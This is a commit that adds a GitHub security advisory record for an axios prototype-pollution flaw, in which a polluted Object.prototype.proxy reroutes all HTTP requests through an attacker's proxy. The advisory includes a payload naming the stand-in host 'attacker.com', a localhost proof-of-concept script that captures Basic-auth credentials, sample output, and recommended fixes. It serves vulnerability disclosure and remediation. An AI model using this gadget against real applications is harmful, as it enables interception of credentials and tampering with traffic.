Skip to content

Commit 61cc0b4

Browse files
1 parent dfd552d commit 61cc0b4

1 file changed

Lines changed: 62 additions & 0 deletions

File tree

Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-35jp-ww65-95wh",
4+
"modified": "2026-05-29T16:04:00Z",
5+
"published": "2026-05-29T16:04:00Z",
6+
"aliases": [
7+
"CVE-2026-44494"
8+
],
9+
"summary": "axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`",
10+
"details": "# Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`\n\n## Summary\n\nThe Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any `Object.prototype` pollution in the application's dependency tree to be escalated into a **full Man-in-the-Middle (MITM) attack** — intercepting, reading, and modifying all HTTP traffic including authentication credentials.\n\nThe HTTP adapter at `lib/adapters/http.js:670` reads `config.proxy` via standard property access, which traverses the prototype chain. Because `proxy` is **not present in Axios defaults**, the merged config object has no own `proxy` property, making it trivially injectable via prototype pollution. Once injected, `setProxy()` routes **all** HTTP requests through the attacker's proxy server.\n\nUnlike the `transformResponse` gadget (which is constrained by `assertOptions` to return `true`), the proxy gadget has **zero constraints** — the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.\n\n**Severity:** Critical (CVSS 9.4)\n**Affected Versions:** All versions (v0.x - v1.x including v1.15.0)\n**Vulnerable Component:** `lib/adapters/http.js` (config property access on merged object)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')\n- **CWE-441:** Unintended Proxy or Intermediary ('Confused Deputy')\n\n## CVSS 3.1\n\n**Score: 9.4 (Critical)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP is triggered remotely via any vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, single property assignment: `Object.prototype.proxy = {host:'attacker', port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | MITM within the application's network context |\n| Confidentiality | **High** | Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames) |\n| Integrity | **High** | Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. **No constraints** — unlike `transformResponse` which must return `true` |\n| Availability | Low | Attacker could drop requests or return errors, but this is secondary to C/I impact |\n\n\n### Why This Bypasses mergeConfig\n\nThe critical difference from `transformResponse`: the `proxy` property is **not in defaults** (`lib/defaults/index.js` does not set `proxy`). This means:\n\n1. `mergeConfig` iterates `Object.keys({...defaults, ...userConfig})` — `proxy` is NOT in this set\n2. `defaultToConfig2` for `proxy` is never called\n3. The merged config has **no own `proxy` property**\n4. When `http.js:670` reads `config.proxy`, JavaScript traverses the prototype chain\n5. `Object.prototype.proxy` is found → used by `setProxy()`\n\nThis is a **more direct attack path** than `transformResponse` because it doesn't even go through `mergeConfig`'s merge logic — it completely bypasses it.\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input**.\n\nIf an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically use the polluted `proxy` value when making HTTP requests. The developer's code is completely safe — no configuration errors needed.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\n\nImagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:\n\n```javascript\nObject.prototype.proxy = {\n host: 'attacker.com',\n port: 8080,\n protocol: 'http',\n};\n```\n\n### 2. The Gadget Trigger (Safe Code)\n\nThe application makes a completely safe, hardcoded request:\n\n```javascript\n// This looks safe to the developer — no proxy configured\nconst response = await axios.get('https://api.internal.corp/secrets', {\n auth: { username: 'svc-account', password: 'prod-key-abc123!' }\n});\n```\n\n### 3. The Execution\n\nAt `http.js:668-670`:\n```javascript\nsetProxy(\n options,\n config.proxy, // ← traverses prototype chain → finds polluted proxy\n protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path\n);\n```\n\n`setProxy()` at `http.js:191-239` then:\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy; // = { host: 'attacker.com', port: 8080 }\n // ...\n if (proxy) {\n options.hostname = proxy.hostname || proxy.host; // → 'attacker.com'\n options.port = proxy.port; // → 8080\n options.path = location; // → full URL as path\n // ...\n }\n}\n```\n\n### 4. The Impact (Full MITM)\n\nThe attacker's proxy server receives:\n\n```http\nGET http://api.internal.corp/secrets HTTP/1.1\nHost: api.internal.corp\nAuthorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==\nUser-Agent: axios/1.15.0\nAccept: application/json, text/plain, */*\n```\n\nThe `Authorization` header contains `svc-account:prod-key-abc123!` in Base64. The attacker:\n- **Sees** every request URL, header, and body\n- **Modifies** every response (inject malicious data, change auth results)\n- **Logs** all API keys, session tokens, and passwords\n- Operates as an **invisible** proxy — the developer has no indication\n\n### 5. Verified PoC Code\n\n```javascript\nimport http from 'http';\nimport axios from './index.js';\n\n// Attacker's proxy server\nconst intercepted = [];\nconst proxyServer = http.createServer((req, res) => {\n intercepted.push({\n url: req.url,\n authorization: req.headers.authorization,\n headers: req.headers,\n });\n res.writeHead(200, { 'Content-Type': 'application/json' });\n res.end('{\"hijacked\":true}');\n});\nawait new Promise(r => proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Real target server\nconst realServer = http.createServer((req, res) => {\n res.writeHead(200);\n res.end('{\"data\":\"real\"}');\n});\nawait new Promise(r => realServer.listen(0, r));\nconst realPort = realServer.address().port;\n\n// Prototype pollution\nObject.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };\n\n// \"Safe\" request — goes through attacker's proxy\nconst resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {\n auth: { username: 'admin', password: 'SuperSecret123!' }\n});\n\nconsole.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');\nconsole.log('Intercepted Authorization:', intercepted[0]?.authorization);\n// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)\n\ndelete Object.prototype.proxy;\nrealServer.close();\nproxyServer.close();\n```\n\n## Verified PoC Output\n\n```\n[1] Normal request (before pollution):\n Response source: real server\n response.data: {\"data\":\"from-real-server\"}\n Proxy intercept count: 0\n\n[2] Prototype Pollution: Object.prototype.proxy\n Set: Object.prototype.proxy = { host: \"127.0.0.1\", port: 50879 }\n\n[3] Request after pollution (same code, same URL):\n Response source: ATTACKER PROXY!\n response.data: {\"data\":\"from-attacker-proxy\",\"hijacked\":true}\n\n[4] Data intercepted by attacker's proxy:\n Full URL: http://127.0.0.1:50878/api/secrets\n Host: 127.0.0.1:50878\n Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\n All headers: {\n \"accept\": \"application/json, text/plain, */*\",\n \"user-agent\": \"axios/1.15.0\",\n \"accept-encoding\": \"gzip, compress, deflate, br\",\n \"host\": \"127.0.0.1:50878\",\n \"authorization\": \"Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\",\n \"connection\": \"keep-alive\"\n }\n\n[5] Attacker capabilities demonstrated:\n ✓ Full URL visible (including internal hostnames)\n ✓ Authorization header visible (Base64-encoded credentials)\n ✓ Can modify/forge response data\n ✓ Affects ALL axios HTTP requests (not just a single instance)\n ✓ No assertOptions constraints (unlike transformResponse gadget)\n```\n\n## Impact Analysis\n\n- **Full Credential Interception:** Every HTTP request's `Authorization` header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.\n- **Arbitrary Response Tampering:** The attacker can return any response data — no constraints like `transformResponse`'s \"must return true\".\n- **Internal Network Reconnaissance:** The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.\n- **Universal Scope:** Affects every axios HTTP request in the application, including all third-party libraries that use axios.\n- **Invisible Attack:** The developer has no indication that a proxy has been injected — requests complete normally with attacker-controlled responses.\n- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.\n\n### Why This Is More Severe Than transformResponse (axios_26)\n\n| Dimension | transformResponse Gadget | **proxy Gadget** |\n|---|---|---|\n| Data access | `this.auth` + response data | **All headers, auth, body, URL, response** |\n| Response control | Must return `true` | **Arbitrary responses** |\n| Attack visibility | Response becomes `true` (suspicious) | **Normal-looking responses (invisible)** |\n| mergeConfig involvement | Goes through defaultToConfig2 | **Bypasses mergeConfig entirely** |\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties\n\n```javascript\n// In lib/adapters/http.js\nconst proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;\nsetProxy(options, proxy, location);\n```\n\n### Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`\n\nProperties not in defaults that are read by http.js and have security impact:\n- `config.proxy` — MITM\n- `config.socketPath` — Unix socket SSRF\n- `config.transport` — request hijack\n- `config.lookup` — DNS hijack\n- `config.beforeRedirect` — redirect manipulation\n- `config.httpAgent` / `config.httpsAgent` — agent injection\n\nAll should use `hasOwnProperty` checks.\n\n### Fix 3: Use null-prototype object for merged config\n\n```javascript\n// In lib/core/mergeConfig.js\nconst config = Object.create(null);\n```\n\n## Resources\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [CWE-441: Unintended Proxy](https://cwe.mitre.org/data/definitions/441.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-16 | Vulnerability discovered during source code audit |\n| 2026-04-16 | PoC developed and verified — full MITM confirmed |\n| TBD | Report submitted to vendor via GitHub Security Advisory |",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "axios"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.0.0"
29+
},
30+
{
31+
"fixed": "1.16.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://github.com/advisories/GHSA-fvcv-3m26-pcqx"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/axios/axios"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-441",
55+
"CWE-1321"
56+
],
57+
"severity": "HIGH",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-05-29T16:04:00Z",
60+
"nvd_published_at": null
61+
}
62+
}

0 commit comments

Comments
 (0)